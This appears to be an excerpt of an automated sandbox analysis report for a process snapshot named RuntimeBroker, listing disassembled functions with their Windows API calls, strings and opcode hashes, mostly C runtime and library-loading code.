LoadLibraryExW.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D06D
GetLastError.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D07B
LoadLibraryExW.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D0A5
FreeLibrary.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D113
GetProcAddress.KERNEL32(?,?,?,00007FF72B05D29A,?,?,?,00007FF72B05CF8C,?,?,?,00007FF72B05CB89), ref: 00007FF72B05D11F

Strings

api-ms-, xrefs: 00007FF72B05D08D

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Library$Load$AddressErrorFreeLastProc
String ID: api-ms-
API String ID: 2559590344-2084034818
Opcode ID: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction ID: df023e2298bdeeb8481cb12f4e837c6c823218dad9533ba20b80511e0983d0da
Opcode Fuzzy Hash: ae36e00ef30d4e956021163d7a0c1bae911f6c658fcf96311cd3d9d96979b27c
Instruction Fuzzy Hash: 2E31932161A646D1EE33BB5AAC54B79A394FF04B60FD91636DD1D07B60EE3CE4428B30

Function 00007FF72B06A460 Relevance: 10.6, APIs: 7, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32 ref: 00007FF72B06A46F
FlsGetValue.KERNEL32 ref: 00007FF72B06A484
FlsSetValue.KERNEL32 ref: 00007FF72B06A4A5
FlsSetValue.KERNEL32 ref: 00007FF72B06A4D2
FlsSetValue.KERNEL32 ref: 00007FF72B06A4E3
FlsSetValue.KERNEL32 ref: 00007FF72B06A4F4
SetLastError.KERNEL32 ref: 00007FF72B06A50F

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: b7fe2b7561df6cd4c7c1d854bd8c4ee8707a2c1e4b543b2cdc9668ec51387f6f
Instruction ID: cb6f89516d80d5f9613f13bc08ebc82a260d38583f06ac38178ceab5761d2cf3
Opcode Fuzzy Hash: b7fe2b7561df6cd4c7c1d854bd8c4ee8707a2c1e4b543b2cdc9668ec51387f6f
Instruction Fuzzy Hash: 16210E20B0825242FA7B732E5D99179E182DF8C7B0F944638D93E06AF6DD2CE4414E21

Function 00007FF72B07707C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48fileCOMMON

Download Yara Rule

APIs

WriteConsoleW.KERNEL32 ref: 00007FF72B0770AD
GetLastError.KERNEL32 ref: 00007FF72B0770B9
CloseHandle.KERNEL32 ref: 00007FF72B0770D1
CreateFileW.KERNEL32 ref: 00007FF72B0770FC
WriteConsoleW.KERNEL32 ref: 00007FF72B07711B

Strings

CONOUT$, xrefs: 00007FF72B0770DD

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
String ID: CONOUT$
API String ID: 3230265001-3130406586
Opcode ID: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction ID: 48a4d459991f99ea64e03fd754b3860bcf394cf5b6e836a4b0acdd0f1642a9d2
Opcode Fuzzy Hash: 274174309ff0e3cf7757a3f5c883333dff1858e51aae267b9afc88cc39a62d3b
Instruction Fuzzy Hash: B5118431B18A4186E7619B5AEC54335E3A0FB58BE4F804234DA1D477B4DF3CE504CB50

Function 00007FF72B06A5D8 Relevance: 9.1, APIs: 6, Instructions: 57COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A5E7
FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A61D
FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A64A
FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A65B
FlsSetValue.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A66C
SetLastError.KERNEL32(?,?,?,00007FF72B0643FD,?,?,?,?,00007FF72B06979A,?,?,?,?,00007FF72B06649F), ref: 00007FF72B06A687

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Value$ErrorLast
String ID:
API String ID: 2506987500-0
Opcode ID: 7696e44328a1602cd582e56c236ae7bac79167df8c45cc5896bb346a15a7f285
Instruction ID: 5154325346bcd13582cde51b916ee0997c9659df550ba03f4b500074696e9fc0
Opcode Fuzzy Hash: 7696e44328a1602cd582e56c236ae7bac79167df8c45cc5896bb346a15a7f285
Instruction Fuzzy Hash: 77113B20F0824246FA76772E5E95139E142DF5C7B0F845738E93E066F6DE2CE4814F21

Function 00007FF72B052300 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 81windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32 ref: 00007FF72B052338
DialogBoxIndirectParamW.USER32 ref: 00007FF72B0523FE
DeleteObject.GDI32 ref: 00007FF72B052431
DestroyIcon.USER32 ref: 00007FF72B052443

Strings

Unhandled exception in script, xrefs: 00007FF72B052368

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: DeleteDestroyDialogHandleIconIndirectModuleObjectParam
String ID: Unhandled exception in script
API String ID: 3081866767-2699770090
Opcode ID: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
Instruction ID: b523bfab92ddce5909999e6465ec525f404d981f6fbb7e028b73b5c6873eeaff
Opcode Fuzzy Hash: 43e0e9fc7257205e5ba4956726e7fb7afbd4954ec96d29d9005c09c1dc537ba6
Instruction Fuzzy Hash: 28316572609A8285EB35EF65EC552F9A360FF89794F840135EA4D4BB69DF3CD104CB10

Function 00007FF72B052760 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 57windowCOMMON

Download Yara Rule

APIs

Part of subcall function 00007FF72B0586B0: MultiByteToWideChar.KERNEL32(?,?,?,00007FF72B053FA4,00000000,00007FF72B051925), ref: 00007FF72B0586E9

MessageBoxW.USER32 ref: 00007FF72B05283B
MessageBoxA.USER32 ref: 00007FF72B05284F

Strings

Error, xrefs: 00007FF72B05282C
Error/warning (ANSI fallback), xrefs: 00007FF72B052843
%s%s: %s, xrefs: 00007FF72B0527EC

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Message$ByteCharMultiWide
String ID: %s%s: %s$Error$Error/warning (ANSI fallback)
API String ID: 1878133881-640379615
Opcode ID: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
Instruction ID: af1387d9db9d7d3bf83509ff0e6c4c7990992e76bb330028233f50d2ce082711
Opcode Fuzzy Hash: c7e22cebafa3b4081381e7f20538df90bc3c47857982eb0ae5879fef5a553f49
Instruction Fuzzy Hash: 1521627261868581F631AB14F8917EAE364FF84788F805036E68C03AA9DF7CD645CF50

Function 00007FF72B068DA0 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 27libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleExW.KERNEL32 ref: 00007FF72B068DC5
GetProcAddress.KERNEL32 ref: 00007FF72B068DDB
FreeLibrary.KERNEL32 ref: 00007FF72B068E02

Strings

mscoree.dll, xrefs: 00007FF72B068DBC
CorExitProcess, xrefs: 00007FF72B068DD4

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: AddressFreeHandleLibraryModuleProc
String ID: CorExitProcess$mscoree.dll
API String ID: 4061214504-1276376045
Opcode ID: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction ID: 8e3b3e306574e7f61bf58f8bf8c1e9b279429b4e0d4639f729e3fe6385c65779
Opcode Fuzzy Hash: f1eb0c22b123c1cdb2873c61f44d146b1d21622817f8dd4d6a21f18b4a6e3d93
Instruction Fuzzy Hash: B0F04F21B1970282EA21AB28AC58379D360EF49761FD4063AC66E462F4CF2CE549DB24

Function 00007FF72B078678 Relevance: 7.6, APIs: 5, Instructions: 56COMMONLIBRARYCODE

Download Yara Rule

APIs

_set_statfp.LIBCMT ref: 00007FF72B0786A0
_set_statfp.LIBCMT ref: 00007FF72B0786BB
_set_statfp.LIBCMT ref: 00007FF72B0786D7
_set_statfp.LIBCMT ref: 00007FF72B078713

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _set_statfp
String ID:
API String ID: 1156100317-0
Opcode ID: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction ID: cdbec39fe88b8b913bc251ff7848899eab10ab288a91432b798b2634b240b1d5
Opcode Fuzzy Hash: bce21d2362216a5e504affcf34f2858e363de54600403cac3d1eeb36cb2ab404
Instruction Fuzzy Hash: 8A119D22E18B0615F676332EEC55375C140EF54374FA58634EA6F066FADE6CB880A938

Function 00007FF72B06A6A0 Relevance: 7.6, APIs: 5, Instructions: 54COMMONLIBRARYCODE

Download Yara Rule

APIs

FlsGetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A6BF
FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A6DE
FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A706
FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A717
FlsSetValue.KERNEL32(?,?,?,00007FF72B0698B3,?,?,00000000,00007FF72B069B4E,?,?,?,?,?,00007FF72B069ADA), ref: 00007FF72B06A728

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 67d7c9a4660121c24c4849512b9cbc25590cd10ead7cd9dc77a6027d31c3e6e3
Instruction ID: 1364caece26dab5515411e034ba650f93c67f1b4400aaee923452db8bc1a894e
Opcode Fuzzy Hash: 67d7c9a4660121c24c4849512b9cbc25590cd10ead7cd9dc77a6027d31c3e6e3
Instruction Fuzzy Hash: AE112E60B0824241FA7A732E5D45579A191DF5C3A0E848338E83D066F6DE2CF9414E21

Function 00007FF72B06A534 Relevance: 7.6, APIs: 5, Instructions: 50COMMON

Download Yara Rule

APIs

FlsGetValue.KERNEL32 ref: 00007FF72B06A545
FlsSetValue.KERNEL32 ref: 00007FF72B06A564
FlsSetValue.KERNEL32 ref: 00007FF72B06A58C
FlsSetValue.KERNEL32 ref: 00007FF72B06A59D
FlsSetValue.KERNEL32 ref: 00007FF72B06A5AE

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Value
String ID:
API String ID: 3702945584-0
Opcode ID: 581e4780875054967335282bc59389d1b6b850a269c2162d209fd03ec5aafdf4
Instruction ID: e1e106ad7c24c868b650aa32ceaa768513105a404262aad3cbfed5e7d7309070
Opcode Fuzzy Hash: 581e4780875054967335282bc59389d1b6b850a269c2162d209fd03ec5aafdf4
Instruction Fuzzy Hash: C811AF60F0820742FABBB32E5C55179A282DF4D360E98463CD93E0A6F2ED2CB4814E25

Function 00007FF72B0652B0 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 242COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0652EC
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B065416
_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B0654CC

Strings

verbose, xrefs: 00007FF72B0652C0

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: verbose
API String ID: 3215553584-579935070
Opcode ID: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction ID: b2c19d59ef05b815ccca853d3ac178b81d870d9a207edadf02daf4337dd2a9e1
Opcode Fuzzy Hash: f7ed0d29023b39033d3e63b48c2fcebc8df79207a036ffcb4dd83b8b3075c670
Instruction Fuzzy Hash: B191B232B08A4A41E772AF29D85137DB691FB48B58FC8413ADB5D463E6DF3CE4458B20

Function 00007FF72B06EED8 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 219COMMON

Download Yara Rule

APIs

_invalid_parameter_noinfo.LIBCMT ref: 00007FF72B06F1B7

Part of subcall function 00007FF72B066D4C: _invalid_parameter_noinfo.LIBCMT ref: 00007FF72B066D69

Strings

UTF-8, xrefs: 00007FF72B06F136
UTF-16LEUNICODE, xrefs: 00007FF72B06F155
ccs, xrefs: 00007FF72B06F0F2

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: _invalid_parameter_noinfo
String ID: UTF-16LEUNICODE$UTF-8$ccs
API String ID: 3215553584-1196891531
Opcode ID: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction ID: 4f010d35ff208d2c723585413aa800c4e70c2e295ecb55bdf8dce9ed40208194
Opcode Fuzzy Hash: f2afffe6052eb22f88312eb2a9052de40cf8af355caad6dfb5a285a3356e609b
Instruction Fuzzy Hash: EB81A472F0820385F7766F2DC910279A6A0EB19B44FD5803DDA09972F6DF2DE9419F21

Function 00007FF72B05C968 Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 154COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF72B05C993
_IsNonwritableInCurrentImage.LIBCMT ref: 00007FF72B05CA2A
RtlUnwindEx.KERNEL32 ref: 00007FF72B05CA84

Strings

csm, xrefs: 00007FF72B05CA11

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CurrentImageNonwritableUnwind__except_validate_context_record
String ID: csm
API String ID: 2395640692-1018135373
Opcode ID: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction ID: 32d30eb9b581d902e34a83233bec81a9ddfc7516a7bd881ef265421ed143e5cd
Opcode Fuzzy Hash: 8b87fa2c553d9157ee5c92b9fa7cd74c02d8a8cd0f0d05c46c7470457ee5a2ed
Instruction Fuzzy Hash: 7F51B632B196428AEB35EF1DE884A79B791FB44B88F904131DA8D43B55EF7DE841CB10

Function 00007FF72B05E1F8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

EncodePointer.KERNEL32 ref: 00007FF72B05E257
_CallSETranslator.LIBVCRUNTIME ref: 00007FF72B05E2A3

Strings

MOC, xrefs: 00007FF72B05E26B
RCC, xrefs: 00007FF72B05E273

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CallEncodePointerTranslator
String ID: MOC$RCC
API String ID: 3544855599-2084237596
Opcode ID: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
Instruction ID: e8aa95862f049df6bdb488c92c46f8a077187875982a9bd6e7b22285e5271803
Opcode Fuzzy Hash: 7372cc8c5436f01c7c5bf562e068c966f7e5f7c30121bdd0ddd9e56561cf3a97
Instruction Fuzzy Hash: 3A617232908B8585D732AB19E8807AAB7A4FB85794F444225EBDD03BA5DF7CE190CF10

Function 00007FF72B05E5A8 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 146COMMON

Download Yara Rule

APIs

__except_validate_context_record.LIBVCRUNTIME ref: 00007FF72B05E5D0
__FrameHandler3::FrameUnwindToEmptyState.LIBVCRUNTIME ref: 00007FF72B05E6B8

Strings

csm, xrefs: 00007FF72B05E70A
csm, xrefs: 00007FF72B05E5F2

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: Frame$EmptyHandler3::StateUnwind__except_validate_context_record
String ID: csm$csm
API String ID: 3896166516-3733052814
Opcode ID: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction ID: e8dd506dfc603b8a3917fa28343397097fc7c12650f289d89f0e31019f2befc8
Opcode Fuzzy Hash: 35f1ba398413474562c31f87a28067be7b3dedf2abf1bb91a394967b9293af31
Instruction Fuzzy Hash: 67519F36A082468AEB75AF19D8C4268B698FB54BC4F948136DA9D43FE1CF3CE450CF11

Function 00007FF72B057530 Relevance: 7.1, APIs: 1, Strings: 3, Instructions: 81COMMON

Download Yara Rule

APIs

CreateDirectoryW.KERNEL32(00000000,?,00007FF72B05324C,?,?,00007FF72B053964), ref: 00007FF72B057642

Strings

%s%c, xrefs: 00007FF72B0575B4
\, xrefs: 00007FF72B0575A7
%.*s, xrefs: 00007FF72B0575FB

Memory Dump Source

Source File: 00000005.00000002.1856747408.00007FF72B051000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF72B050000, based on PE: true

Associated: 00000005.00000002.1855463279.00007FF72B050000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1860006948.00007FF72B07B000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B08E000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1862731365.00007FF72B094000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000005.00000002.1864878442.00007FF72B096000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_7ff72b050000_RuntimeBroker.jbxd

Similarity

API ID: CreateDirectory
String ID: %.*s$%s%c$\
API String ID: 4241100979-1685191245
Opcode ID: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
Instruction ID: 670eb64b3ad20e227d6b924cd6b13f2152e80743bbe40f4b4cf199082df6a548
Opcode Fuzzy Hash: 7bb6789f982dd078021ca405e37f28ebc21f271831f10c16ba6710f0d2331ec5
Instruction Fuzzy Hash: E931EA71619AC545FA32AB18EC507EAA254FB44BE0FC04231EE6D43FE5DF2CE6418B10

Function 00007FF72B0525F0 Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 44windowCOMMON

Download Yara Rule

APIs

